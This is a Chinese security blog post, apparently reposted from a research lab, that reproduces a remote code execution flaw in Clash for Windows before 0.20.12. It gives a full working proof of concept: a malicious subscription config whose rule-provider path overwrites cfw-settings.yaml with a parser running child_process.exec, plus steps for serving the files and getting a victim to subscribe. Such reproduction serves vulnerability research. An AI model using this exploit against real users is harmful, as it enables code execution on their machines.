clash_for_windows_pkg 远程代码执行漏洞复现

admin 2024年12月5日22:36:52评论45 views字数 1523阅读5分4秒阅读模式

clash_for_windows_pkg 远程代码执行漏洞复现

概述

Windows 上的 clash_for_windows 在 0.20.12 在订阅一个恶意链接时存在远程命令执行漏洞。因为对订阅文件中 rule-providers 的 path 的不安全处理导致 cfw-setting.yaml 会被覆盖,cfw-setting.yaml 中 parsers 的 js代码将会被执行。
Chapter 01

影响版本

版本:<0.20.12

操作系统:Windows

Chapter 02

复现步骤

1、启动一个web服务来确保这两个文件可以访问

这里使用python起一个web服务

python -m http.serverServing HTTP on :: port 8000 (http://[::]:8000/) ...

并将下面两个配置文件放在web服务目录下

clash_for_windows_pkg 远程代码执行漏洞复现

config.yaml

port: 7890socks-port: 7891allow-lan: truemode: Rulelog-level: infoexternal-controller: :9090proxies:  - name: a    type: socks5    server: 127.0.0.1    port: "17938"    skip-cert-verify: truerule-providers:  p:    type: http    behavior: domain    url: "http://127.0.0.1:8000/cfw-settings.yaml"    path: ./cfw-settings.yaml    interval: 86400

cfw-settings.yaml

payload:  - DOMAIN-SUFFIX,acl4.ssr,全球直连showNewVersionIcon: truehideAfterStartup: falserandomControllerPort: truerunTimeFormat: "hh : mm : ss"trayOrders:  - - icon  - - status    - traffic    - texthideTrayIcon: falseconnShowProcess: trueshowTrayProxyDelayIndicator: trueprofileParsersText: >-  parsers:    - reg: .*      code:         module.exports.parse = async (raw, { axios, yaml, notify, console }, { name, url, interval, selected }) => {          require("child_process").exec("calc.exe");          return raw;          }

2、受害者使用订阅链接

3、重新启动 clash_for_windows_pkg

4、更新订阅或导入新订阅

clash_for_windows_pkg 远程代码执行漏洞复现

-=[感·谢·阅·读]=-

关于我们

星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。

clash_for_windows_pkg 远程代码执行漏洞复现

原文始发于微信公众号(星网实验室):clash_for_windows_pkg 远程代码执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月5日22:36:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   clash_for_windows_pkg 远程代码执行漏洞复现https://cn-sec.com/archives/1864444.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息